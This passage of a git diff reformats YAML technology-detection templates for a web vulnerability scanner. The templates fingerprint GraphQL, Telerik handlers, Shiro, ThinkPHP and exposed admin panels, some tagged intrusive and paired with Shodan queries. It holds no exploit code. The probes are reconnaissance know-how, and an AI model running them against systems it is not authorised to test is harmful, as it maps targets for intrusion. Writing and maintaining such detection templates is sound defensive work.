Adam Crosser severity: info description: Detects the GraphiQL application - tags: tech,graphiql,graphql metadata: max-request: 1 + tags: tech,graphiql,graphql http: - method: GET @@ -23,4 +23,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/technologies/graphql-detect.yaml b/http/technologies/graphql-detect.yaml index c8724a9108..52a84dff61 100644 --- a/http/technologies/graphql-detect.yaml +++ b/http/technologies/graphql-detect.yaml @@ -4,9 +4,9 @@ info: name: GraphQL API Detection author: nkxxkn,elsfa7110,ofjaaah,exceed severity: info - tags: tech,graphql metadata: max-request: 124 + tags: tech,graphql http: - method: POST @@ -140,8 +140,8 @@ http: Content-Type: application/json body: '{"query":"query IntrospectionQuery{__schema {queryType { name }}}"}' - stop-at-first-match: true + matchers-condition: and matchers: - type: status diff --git a/http/technologies/grav-cms-detect.yaml b/http/technologies/grav-cms-detect.yaml index ff530c568f..a4279702ef 100644 --- a/http/technologies/grav-cms-detect.yaml +++ b/http/technologies/grav-cms-detect.yaml @@ -7,9 +7,9 @@ info: description: Detects Grav CMS reference: - https://github.com/getgrav/grav - tags: tech,grav,cms metadata: max-request: 1 + tags: tech,grav,cms http: - method: GET @@ -18,7 +18,6 @@ http: matchers-condition: or matchers: - - type: word part: header words: @@ -27,4 +26,4 @@ http: - type: word part: body words: - - '' \ No newline at end of file + - '' diff --git a/http/technologies/graylog-api-browser.yaml b/http/technologies/graylog-api-browser.yaml index 354ac9349c..df09f912bd 100644 --- a/http/technologies/graylog-api-browser.yaml +++ b/http/technologies/graylog-api-browser.yaml @@ -4,9 +4,9 @@ info: name: Detect Graylog REST API author: PR3R00T severity: info - tags: tech,graylog metadata: max-request: 1 + tags: tech,graylog http: - method: GET diff --git a/http/technologies/graylog/graylog-api-exposure.yaml b/http/technologies/graylog/graylog-api-exposure.yaml index 30f3f15c97..18e8e6d7f2 100644 --- a/http/technologies/graylog/graylog-api-exposure.yaml +++ b/http/technologies/graylog/graylog-api-exposure.yaml @@ -10,9 +10,9 @@ info: - https://go2docs.graylog.org/5-0/setting_up_graylog/rest_api.html - https://gist.github.com/asachs01/f1f317b2924a688deb8ed2520a4520bd metadata: + verified: true max-request: 50 shodan-query: Graylog - verified: true tags: tech,graylog,api,swagger,fuzz http: @@ -71,6 +71,7 @@ http: host-redirects: true stop-at-first-match: true + matchers-condition: or matchers: - type: dsl diff --git a/http/technologies/gunicorn-detect.yaml b/http/technologies/gunicorn-detect.yaml index 3b8c433413..a99d3e777a 100644 --- a/http/technologies/gunicorn-detect.yaml +++ b/http/technologies/gunicorn-detect.yaml @@ -7,9 +7,9 @@ info: description: Gunicorn Python WSGI HTTP Server for UNIX reference: - https://github.com/benoitc/gunicorn - tags: tech,gunicorn metadata: max-request: 1 + tags: tech,gunicorn http: - method: GET @@ -18,7 +18,6 @@ http: matchers-condition: and matchers: - - type: regex part: header regex: diff --git a/http/technologies/hanwang-detect.yaml b/http/technologies/hanwang-detect.yaml index 0497a4c3e9..806590891d 100644 --- a/http/technologies/hanwang-detect.yaml +++ b/http/technologies/hanwang-detect.yaml @@ -16,6 +16,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -25,4 +26,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/technologies/harbor-detect.yaml b/http/technologies/harbor-detect.yaml index 9b9ca507cf..12b8917ce6 100644 --- a/http/technologies/harbor-detect.yaml +++ b/http/technologies/harbor-detect.yaml @@ -8,8 +8,8 @@ info: reference: - https://github.com/goharbor/harbor metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:657337228 tags: tech,harbor diff --git a/http/technologies/hashicorp-boundary-detect.yaml b/http/technologies/hashicorp-boundary-detect.yaml index a1117bc0eb..809863b6ab 100644 --- a/http/technologies/hashicorp-boundary-detect.yaml +++ b/http/technologies/hashicorp-boundary-detect.yaml @@ -5,9 +5,9 @@ info: author: codexlynx severity: info description: Detects HashiCorp Boundary - tags: tech,hashicorp metadata: max-request: 1 + tags: tech,hashicorp http: - method: GET diff --git a/http/technologies/hashicorp-vault-detect.yaml b/http/technologies/hashicorp-vault-detect.yaml index f2c91181b9..b1f0b9aeb9 100644 --- a/http/technologies/hashicorp-vault-detect.yaml +++ b/http/technologies/hashicorp-vault-detect.yaml @@ -5,9 +5,9 @@ info: author: Adam Crosser severity: info description: Detects HashiCorp Vault - tags: tech,hashicorp metadata: max-request: 1 + tags: tech,hashicorp http: - method: GET @@ -18,4 +18,4 @@ http: - type: word part: body words: - - 'Powered by Plone & Python' \ No newline at end of file + - '>Powered by Plone & Python' diff --git a/http/technologies/prestashop-detect.yaml b/http/technologies/prestashop-detect.yaml index ca6306daee..057933bf77 100644 --- a/http/technologies/prestashop-detect.yaml +++ b/http/technologies/prestashop-detect.yaml @@ -23,4 +23,4 @@ http: - Powered by ]+>PrestaShop - - - condition: or \ No newline at end of file + condition: or diff --git a/http/technologies/projectsend-detect.yaml b/http/technologies/projectsend-detect.yaml index f937fe4a90..e836e2375e 100644 --- a/http/technologies/projectsend-detect.yaml +++ b/http/technologies/projectsend-detect.yaml @@ -10,7 +10,7 @@ info: - https://github.com/projectsend/projectsend classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/technologies/prtg-detect.yaml b/http/technologies/prtg-detect.yaml index f9e01ae5e9..0afc3c8120 100644 --- a/http/technologies/prtg-detect.yaml +++ b/http/technologies/prtg-detect.yaml @@ -5,9 +5,9 @@ info: author: geeknik severity: info description: Monitor all the systems, devices, traffic, and applications in your IT infrastructure -- https://www.paessler.com/prtg - tags: tech,prtg metadata: max-request: 3 + tags: tech,prtg http: - method: GET @@ -17,6 +17,7 @@ http: - "{{BaseURL}}/PRTG/index.htm" stop-at-first-match: true + matchers-condition: and matchers: - type: status diff --git a/http/technologies/puppetdb-detect.yaml b/http/technologies/puppetdb-detect.yaml index 99ade48498..f4a00522c2 100644 --- a/http/technologies/puppetdb-detect.yaml +++ b/http/technologies/puppetdb-detect.yaml @@ -6,9 +6,9 @@ info: severity: info reference: - https://puppet.com/docs/puppetdb/7/api/meta/v1/version.html#pdbmetav1version - tags: puppet,tech,exposure metadata: max-request: 1 + tags: puppet,tech,exposure http: - method: GET diff --git a/http/technologies/puppetserver-detect.yaml b/http/technologies/puppetserver-detect.yaml index 3f00b0a062..2ddd0bf2da 100644 --- a/http/technologies/puppetserver-detect.yaml +++ b/http/technologies/puppetserver-detect.yaml @@ -6,9 +6,9 @@ info: severity: info reference: - https://insinuator.net/2020/09/puppet-assessment-techniques/ - tags: tech,puppet,exposure metadata: max-request: 1 + tags: tech,puppet,exposure,intrusive http: - method: GET @@ -35,4 +35,4 @@ http: extractors: - type: kval kval: - - x_puppet_version \ No newline at end of file + - x_puppet_version diff --git a/http/technologies/pypiserver-detect.yaml b/http/technologies/pypiserver-detect.yaml index d0295e6af7..4d83ccae34 100644 --- a/http/technologies/pypiserver-detect.yaml +++ b/http/technologies/pypiserver-detect.yaml @@ -5,8 +5,8 @@ info: author: ritikchaddha severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"pypiserver" tags: tech,pypiserver diff --git a/http/technologies/redcap-detector.yaml b/http/technologies/redcap-detector.yaml index cabc6ad377..1e3190796a 100644 --- a/http/technologies/redcap-detector.yaml +++ b/http/technologies/redcap-detector.yaml @@ -4,9 +4,9 @@ info: name: REDCap detector author: philippedelteil,retr0 severity: info - tags: redcap,tech metadata: max-request: 1 + tags: redcap,tech http: - method: GET diff --git a/http/technologies/redmine-cli-detect.yaml b/http/technologies/redmine-cli-detect.yaml index 89dcb4b9c7..e3bf342482 100644 --- a/http/technologies/redmine-cli-detect.yaml +++ b/http/technologies/redmine-cli-detect.yaml @@ -5,9 +5,9 @@ info: author: geeknik severity: info description: A small command-line utility to interact with Redmine - https://pypi.org/project/Redmine-CLI/ - tags: tech,redmine metadata: max-request: 1 + tags: tech,redmine http: - method: GET diff --git a/http/technologies/rhymix-cms-detect.yaml b/http/technologies/rhymix-cms-detect.yaml index f610e5f8ff..d6d12717d7 100644 --- a/http/technologies/rhymix-cms-detect.yaml +++ b/http/technologies/rhymix-cms-detect.yaml @@ -7,9 +7,9 @@ info: description: Detects Rhymix CMS reference: - https://github.com/rhymix/rhymix - tags: tech,rhymix metadata: max-request: 1 + tags: tech,rhymix http: - method: GET @@ -18,7 +18,6 @@ http: matchers-condition: or matchers: - - type: word part: header words: diff --git a/http/technologies/rosariosis-detect.yaml b/http/technologies/rosariosis-detect.yaml index 383c64d2df..62f37812ed 100644 --- a/http/technologies/rosariosis-detect.yaml +++ b/http/technologies/rosariosis-detect.yaml @@ -7,9 +7,9 @@ info: reference: - https://github.com/francoisjacquet/rosariosis - https://www.rosariosis.org/ - tags: tech,rosariosis metadata: max-request: 1 + tags: tech,rosariosis http: - method: GET diff --git a/http/technologies/roundcube-webmail-portal.yaml b/http/technologies/roundcube-webmail-portal.yaml index f6489e8037..600798bf65 100644 --- a/http/technologies/roundcube-webmail-portal.yaml +++ b/http/technologies/roundcube-webmail-portal.yaml @@ -18,9 +18,9 @@ http: host-redirects: true max-redirects: 2 stop-at-first-match: true + matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/technologies/rsshub-detect.yaml b/http/technologies/rsshub-detect.yaml index 9f6b88c6e6..ac94ced9ce 100644 --- a/http/technologies/rsshub-detect.yaml +++ b/http/technologies/rsshub-detect.yaml @@ -5,8 +5,8 @@ info: author: ritikchaddha severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-1893514038 tags: tech,rsshub diff --git a/http/technologies/s3-detect.yaml b/http/technologies/s3-detect.yaml index f1175df50c..a94b5b97ae 100644 --- a/http/technologies/s3-detect.yaml +++ b/http/technologies/s3-detect.yaml @@ -4,9 +4,9 @@ info: name: Detect Amazon-S3 Bucket author: melbadry9 severity: info - tags: aws,s3,bucket,tech metadata: max-request: 1 + tags: aws,s3,bucket,tech http: - method: GET @@ -24,4 +24,4 @@ http: dsl: - 'contains(to_lower(server), "amazons3")' - 'contains(to_lower(header), "x-amz-id")' - - 'contains(to_lower(header), "x-amz-request-id")' \ No newline at end of file + - 'contains(to_lower(header), "x-amz-request-id")' diff --git a/http/technologies/samsung-smarttv-debug.yaml b/http/technologies/samsung-smarttv-debug.yaml index 2a651de35d..8918f134d2 100644 --- a/http/technologies/samsung-smarttv-debug.yaml +++ b/http/technologies/samsung-smarttv-debug.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Debug Config" tags: samsung,tech,iot diff --git a/http/technologies/sap-spartacus-detect.yaml b/http/technologies/sap-spartacus-detect.yaml index ab77ed2135..6b8ea151de 100644 --- a/http/technologies/sap-spartacus-detect.yaml +++ b/http/technologies/sap-spartacus-detect.yaml @@ -8,8 +8,8 @@ info: reference: - https://github.com/SAP/spartacus metadata: - max-request: 1 verified: true + max-request: 1 tags: tech,sap,hybris,angular,spartacus http: diff --git a/http/technologies/sap/sap-igs-detect.yaml b/http/technologies/sap/sap-igs-detect.yaml index 9e2bea44d1..2e440df3e9 100644 --- a/http/technologies/sap/sap-igs-detect.yaml +++ b/http/technologies/sap/sap-igs-detect.yaml @@ -5,9 +5,9 @@ info: author: _generic_human_ severity: info description: Detection of SAP Internet Graphics Server (IGS) - tags: sap,tech,igs metadata: max-request: 1 + tags: sap,tech,igs http: - method: GET @@ -16,6 +16,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/technologies/sap/sap-netweaver-webgui.yaml b/http/technologies/sap/sap-netweaver-webgui.yaml index 69c7222486..d6a9d959dd 100644 --- a/http/technologies/sap/sap-netweaver-webgui.yaml +++ b/http/technologies/sap/sap-netweaver-webgui.yaml @@ -5,9 +5,9 @@ info: author: randomstr1ng severity: info description: Detection of SAP NetWeaver ABAP Webserver WebGUI - tags: sap,webserver,tech metadata: max-request: 1 + tags: sap,webserver,tech http: - method: GET diff --git a/http/technologies/sap/sap-web-dispatcher-admin-portal.yaml b/http/technologies/sap/sap-web-dispatcher-admin-portal.yaml index 2b538e3550..351f82d2d6 100644 --- a/http/technologies/sap/sap-web-dispatcher-admin-portal.yaml +++ b/http/technologies/sap/sap-web-dispatcher-admin-portal.yaml @@ -14,7 +14,6 @@ http: - method: GET host-redirects: true max-redirects: 2 - path: - "{{BaseURL}}/sap/wdisp/admin/public/default.html" diff --git a/http/technologies/sap/sap-web-dispatcher.yaml b/http/technologies/sap/sap-web-dispatcher.yaml index 5503035d2f..23af986d30 100644 --- a/http/technologies/sap/sap-web-dispatcher.yaml +++ b/http/technologies/sap/sap-web-dispatcher.yaml @@ -5,15 +5,14 @@ info: author: randomstr1ng severity: info description: Detection of SAP Web Dispatcher service - tags: sap,webserver,proxy,tech metadata: max-request: 1 + tags: sap,webserver,proxy,tech http: - method: GET host-redirects: true max-redirects: 2 - path: - "{{BaseURL}}/inormalydonotexist" diff --git a/http/technologies/sceditor-detect.yaml b/http/technologies/sceditor-detect.yaml index 958bc92f27..643136cffe 100644 --- a/http/technologies/sceditor-detect.yaml +++ b/http/technologies/sceditor-detect.yaml @@ -4,9 +4,9 @@ info: name: SCEditor Detect author: pikpikcu severity: info - tags: tech,sceditor metadata: max-request: 1 + tags: tech,sceditor http: - method: GET diff --git a/http/technologies/secui-waf-detect.yaml b/http/technologies/secui-waf-detect.yaml index edaeb7c3c9..8a8267817c 100644 --- a/http/technologies/secui-waf-detect.yaml +++ b/http/technologies/secui-waf-detect.yaml @@ -5,15 +5,15 @@ info: author: gy741 severity: info description: SECUI WAF panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://www.secui.com/en/network/bluemaxng + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-1101206929 tags: tech,panel,secui diff --git a/http/technologies/sharefile-storage-server.yaml b/http/technologies/sharefile-storage-server.yaml index f222dd9449..1bd231425d 100644 --- a/http/technologies/sharefile-storage-server.yaml +++ b/http/technologies/sharefile-storage-server.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"ShareFile Storage Server" tags: tech,citrix,sharefile @@ -17,6 +17,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/technologies/shiro-detect.yaml b/http/technologies/shiro-detect.yaml index e3ba0b1f62..a4909a9d6d 100644 --- a/http/technologies/shiro-detect.yaml +++ b/http/technologies/shiro-detect.yaml @@ -4,17 +4,17 @@ info: name: Detect Shiro Framework author: AresX severity: info - tags: tech,shiro metadata: max-request: 1 + tags: tech,shiro http: - method: GET path: - '{{BaseURL}}' + headers: Cookie: JSESSIONID={{randstr}};rememberMe=123; - host-redirects: true max-redirects: 2 matchers: diff --git a/http/technologies/shopizer-detect.yaml b/http/technologies/shopizer-detect.yaml index 9ee1d06034..4f604f734f 100644 --- a/http/technologies/shopizer-detect.yaml +++ b/http/technologies/shopizer-detect.yaml @@ -4,9 +4,9 @@ info: name: Shopizer Detection author: pikpikcu severity: info - tags: tech,shopizer metadata: max-request: 2 + tags: tech,shopizer http: - method: GET diff --git a/http/technologies/shopware-detect.yaml b/http/technologies/shopware-detect.yaml index 85ca04990e..5ec58eda74 100644 --- a/http/technologies/shopware-detect.yaml +++ b/http/technologies/shopware-detect.yaml @@ -9,8 +9,8 @@ info: - https://github.com/shopware/shopware - https://github.com/shopware/platform metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"shopware AG" tags: tech,shopware,cms @@ -21,6 +21,7 @@ http: - "{{BaseURL}}/backend" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/technologies/sitecore-cms.yaml b/http/technologies/sitecore-cms.yaml index d028912e71..bf9b887261 100644 --- a/http/technologies/sitecore-cms.yaml +++ b/http/technologies/sitecore-cms.yaml @@ -9,8 +9,8 @@ info: reference: | https://www.sitecore.com metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"sitecore" tags: cms,sitecore,tech @@ -20,6 +20,7 @@ http: - "{{BaseURL}}/-/media/doo-doo.ashx" host-redirects: true + matchers-condition: and matchers: - type: regex diff --git a/http/technologies/sitecore-version.yaml b/http/technologies/sitecore-version.yaml index 5db3521cf1..9019592312 100644 --- a/http/technologies/sitecore-version.yaml +++ b/http/technologies/sitecore-version.yaml @@ -6,9 +6,9 @@ info: severity: info reference: - https://www.cvedetails.com/vulnerability-list/vendor_id-9609/Sitecore.html - tags: sitecore,tech metadata: max-request: 1 + tags: sitecore,tech http: - method: GET diff --git a/http/technologies/smartstore-detect.yaml b/http/technologies/smartstore-detect.yaml index 60390b9815..8dcb07e076 100644 --- a/http/technologies/smartstore-detect.yaml +++ b/http/technologies/smartstore-detect.yaml @@ -18,7 +18,6 @@ http: matchers-condition: and matchers: - - type: regex part: body regex: diff --git a/http/technologies/smtp2go-detect.yaml b/http/technologies/smtp2go-detect.yaml index f6a765eee6..5f23e83064 100644 --- a/http/technologies/smtp2go-detect.yaml +++ b/http/technologies/smtp2go-detect.yaml @@ -16,6 +16,7 @@ http: redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/technologies/snipeit-panel.yaml b/http/technologies/snipeit-panel.yaml index a656eb839a..967bf60a8f 100644 --- a/http/technologies/snipeit-panel.yaml +++ b/http/technologies/snipeit-panel.yaml @@ -7,7 +7,7 @@ info: description: Snipe-IT panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/technologies/sogo-detect.yaml b/http/technologies/sogo-detect.yaml index f294a19a51..06cd62d3f4 100644 --- a/http/technologies/sogo-detect.yaml +++ b/http/technologies/sogo-detect.yaml @@ -8,8 +8,8 @@ info: reference: - https://www.sogo.nu/ metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:"SOGo" tags: sogo,tech @@ -22,6 +22,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/technologies/sonicwall-email-security-detect.yaml b/http/technologies/sonicwall-email-security-detect.yaml index 6863f8c845..99a6be4998 100644 --- a/http/technologies/sonicwall-email-security-detect.yaml +++ b/http/technologies/sonicwall-email-security-detect.yaml @@ -5,16 +5,16 @@ info: author: gy741 severity: info description: SonicWall Email Security panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://www.fireeye.com/blog/threat-research/2021/04/zero-day-exploits-in-sonicwall-email-security-lead-to-compromise.html - https://www.sonicwall.com/support/product-notification/security-notice-sonicwall-email-security-zero-day-vulnerabilities/210416112932360/ - tags: tech,panel,sonicwall + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: max-request: 1 + tags: tech,panel,sonicwall http: - method: GET diff --git a/http/technologies/spinnaker-detect.yaml b/http/technologies/spinnaker-detect.yaml index 46b2938940..84bf94fd60 100644 --- a/http/technologies/spinnaker-detect.yaml +++ b/http/technologies/spinnaker-detect.yaml @@ -5,9 +5,9 @@ info: author: Adam Crosser severity: info description: Detects the Spinnaker continuous delivery software - tags: tech,spinnaker metadata: max-request: 1 + tags: tech,spinnaker http: - method: GET @@ -23,4 +23,4 @@ http: - type: dsl dsl: - - "contains(tolower(header), 'x-spinnaker-priority')" \ No newline at end of file + - "contains(tolower(header), 'x-spinnaker-priority')" diff --git a/http/technologies/splash-rendering-service.yaml b/http/technologies/splash-rendering-service.yaml index 28d3a54c8e..3dbaf94705 100644 --- a/http/technologies/splash-rendering-service.yaml +++ b/http/technologies/splash-rendering-service.yaml @@ -9,11 +9,11 @@ info: - https://github.com/scrapinghub/splash classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Splash" hunter-query: web.title="Splash" && header="TwistedWeb" tags: tech,splash,detect diff --git a/http/technologies/spring-detect.yaml b/http/technologies/spring-detect.yaml index 9936f2f381..46baccff7c 100644 --- a/http/technologies/spring-detect.yaml +++ b/http/technologies/spring-detect.yaml @@ -6,9 +6,9 @@ info: severity: info reference: - https://mkyong.com/spring-boot/spring-rest-error-handling-example/ - tags: tech,java,spring metadata: max-request: 1 + tags: tech,java,spring http: - method: GET @@ -17,6 +17,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/technologies/springboot-actuator.yaml b/http/technologies/springboot-actuator.yaml index b5f4cc2fe0..4e02d27422 100644 --- a/http/technologies/springboot-actuator.yaml +++ b/http/technologies/springboot-actuator.yaml @@ -18,6 +18,7 @@ http: - "{{BaseURL}}/actuator/favicon.ico" stop-at-first-match: true + matchers-condition: or matchers: - type: word diff --git a/http/technologies/springboot-whitelabel.yaml b/http/technologies/springboot-whitelabel.yaml index 17fc4d6a85..525648f10d 100644 --- a/http/technologies/springboot-whitelabel.yaml +++ b/http/technologies/springboot-whitelabel.yaml @@ -7,9 +7,9 @@ info: reference: - https://codingnconcepts.com/spring-boot/disable-whitelabel-error-page-spring-boot/ metadata: + verified: true max-request: 1 shodan:query: html:"Whitelabel Error Page" - verified: true tags: tech,spring,springboot,errorpage http: @@ -21,6 +21,7 @@ http: host-redirects: true max-redirects: 3 + matchers-condition: and matchers: - type: word diff --git a/http/technologies/strapi-cms-detect.yaml b/http/technologies/strapi-cms-detect.yaml index 95333e9401..aadae95342 100644 --- a/http/technologies/strapi-cms-detect.yaml +++ b/http/technologies/strapi-cms-detect.yaml @@ -7,9 +7,9 @@ info: description: Open source Node.js Headless CMS to easily build customisable APIs reference: - https://github.com/strapi/strapi - tags: tech,strapi,cms metadata: max-request: 1 + tags: tech,strapi,cms http: - method: GET diff --git a/http/technologies/subrion-cms-detect.yaml b/http/technologies/subrion-cms-detect.yaml index 953341c404..6332e16baa 100644 --- a/http/technologies/subrion-cms-detect.yaml +++ b/http/technologies/subrion-cms-detect.yaml @@ -6,8 +6,8 @@ info: severity: info metadata: max-request: 1 - fofa-query: title="subrion" shodan-query: http.component:"Subrion" + fofa-query: title="subrion" tags: subrion,tech http: diff --git a/http/technologies/sucuri-firewall.yaml b/http/technologies/sucuri-firewall.yaml index 1bc95e034c..cd668ad173 100644 --- a/http/technologies/sucuri-firewall.yaml +++ b/http/technologies/sucuri-firewall.yaml @@ -6,8 +6,8 @@ info: severity: info metadata: max-request: 1 - fofa-query: "sucuri firewall" shodan-query: http.html:"sucuri firewall" + fofa-query: "sucuri firewall" tags: tech,sucuri,firewall http: diff --git a/http/technologies/swag-instance-default-page.yaml b/http/technologies/swag-instance-default-page.yaml index 31d11a70f5..d63f0f6317 100644 --- a/http/technologies/swag-instance-default-page.yaml +++ b/http/technologies/swag-instance-default-page.yaml @@ -7,11 +7,11 @@ info: description: Swag Instance Default Page panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Welcome to your SWAG instance" tags: panel,tech @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: word words: - "Welcome to your SWAG instance" diff --git a/http/technologies/switch-protocol.yaml b/http/technologies/switch-protocol.yaml index 7c0b46e378..7257223109 100644 --- a/http/technologies/switch-protocol.yaml +++ b/http/technologies/switch-protocol.yaml @@ -5,8 +5,8 @@ info: author: pdteam severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: '"connection: upgrade"' tags: protocol,switching,tech,websocket,h2c diff --git a/http/technologies/synology-web-station.yaml b/http/technologies/synology-web-station.yaml index fa6485612c..549cf98b71 100644 --- a/http/technologies/synology-web-station.yaml +++ b/http/technologies/synology-web-station.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/7125 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: tech,synology,edb metadata: max-request: 1 + tags: tech,synology,edb http: - method: GET diff --git a/http/technologies/tableau-server-detect.yaml b/http/technologies/tableau-server-detect.yaml index 9ce3583657..ec028196fe 100644 --- a/http/technologies/tableau-server-detect.yaml +++ b/http/technologies/tableau-server-detect.yaml @@ -5,9 +5,9 @@ info: author: TechbrunchFR severity: info description: Detects Tableau Server and extract the buildId - tags: tech,tableau metadata: max-request: 1 + tags: tech,tableau http: - method: GET diff --git a/http/technologies/telerik/telerik-dialoghandler-detect.yaml b/http/technologies/telerik/telerik-dialoghandler-detect.yaml index 3b72a9f817..dd3e7c84e5 100644 --- a/http/technologies/telerik/telerik-dialoghandler-detect.yaml +++ b/http/technologies/telerik/telerik-dialoghandler-detect.yaml @@ -8,9 +8,9 @@ info: reference: - https://captmeelo.com/pentest/2018/08/03/pwning-with-telerik.html - https://github.com/bao7uo/dp_crypto - tags: tech,telerik,asp metadata: max-request: 17 + tags: tech,telerik,asp http: - method: GET @@ -34,11 +34,13 @@ http: - '{{BaseURL}}/Telerik.Web.UI.DialogHandler.axd?dp=1' stop-at-first-match: true + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - 'Invalid length for a Base-64 char array' diff --git a/http/technologies/telerik/telerik-fileupload-detect.yaml b/http/technologies/telerik/telerik-fileupload-detect.yaml index 722e72e10f..bd8efca9fb 100644 --- a/http/technologies/telerik/telerik-fileupload-detect.yaml +++ b/http/technologies/telerik/telerik-fileupload-detect.yaml @@ -5,9 +5,9 @@ info: author: organiccrap severity: info description: This template detects the Telerik Web UI fileupload handler. - tags: tech,telerik,fileupload metadata: max-request: 1 + tags: tech,telerik,fileupload,intrusive http: - method: GET diff --git a/http/technologies/teradici-pcoip.yaml b/http/technologies/teradici-pcoip.yaml index b8bcc73bc5..ef0f3959b8 100644 --- a/http/technologies/teradici-pcoip.yaml +++ b/http/technologies/teradici-pcoip.yaml @@ -9,9 +9,9 @@ info: - https://www.teradici.com/ classification: cwe-id: CWE-200 - tags: tech,pcoip metadata: max-request: 1 + tags: tech,pcoip http: - method: GET diff --git a/http/technologies/terraform-detect.yaml b/http/technologies/terraform-detect.yaml index e83fd6a394..f8b464867d 100644 --- a/http/technologies/terraform-detect.yaml +++ b/http/technologies/terraform-detect.yaml @@ -5,9 +5,9 @@ info: author: geeknik severity: info description: Write Infrastructure as Code - https://www.terraform.io/ - tags: tech,terraform metadata: max-request: 1 + tags: tech,terraform http: - method: GET diff --git a/http/technologies/thinkcmf-detect.yaml b/http/technologies/thinkcmf-detect.yaml index dec99687cd..f2db52efdb 100644 --- a/http/technologies/thinkcmf-detect.yaml +++ b/http/technologies/thinkcmf-detect.yaml @@ -7,11 +7,11 @@ info: description: ThinkCMF panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,thinkcmf,login,tech metadata: max-request: 1 + tags: panel,thinkcmf,login,tech http: - method: GET diff --git a/http/technologies/thinkphp-detect.yaml b/http/technologies/thinkphp-detect.yaml index d2c9e4ea1c..caf7c88cbc 100644 --- a/http/technologies/thinkphp-detect.yaml +++ b/http/technologies/thinkphp-detect.yaml @@ -7,14 +7,14 @@ info: description: ThinkPHP was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"ThinkPHP" fofa-query: app="ThinkPHP" - tags: thinkphp,tech,detect + tags: thinkphp,tech,detect,intrusive http: - method: GET @@ -23,6 +23,7 @@ http: - "{{BaseURL}}/?s={{randstr}}&c={{randstr}}&a={{randstr}}&m={{randstr}}" stop-at-first-match: true + matchers-condition: or matchers: - type: word diff --git a/http/technologies/tileserver-gl.yaml b/http/technologies/tileserver-gl.yaml index 597e35ff1f..97c96dfa2d 100644 --- a/http/technologies/tileserver-gl.yaml +++ b/http/technologies/tileserver-gl.yaml @@ -9,7 +9,7 @@ info: - https://www.exploit-db.com/ghdb/7296 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/technologies/tor-socks-proxy.yaml b/http/technologies/tor-socks-proxy.yaml index 7f35774c11..c5edf0fd92 100644 --- a/http/technologies/tor-socks-proxy.yaml +++ b/http/technologies/tor-socks-proxy.yaml @@ -4,9 +4,9 @@ info: name: Detect tor SOCKS proxy author: geeknik severity: info - tags: tech,tor,proxy metadata: max-request: 1 + tags: tech,tor,proxy http: - method: GET @@ -21,6 +21,7 @@ http: - "HTTPTunnelPort" - 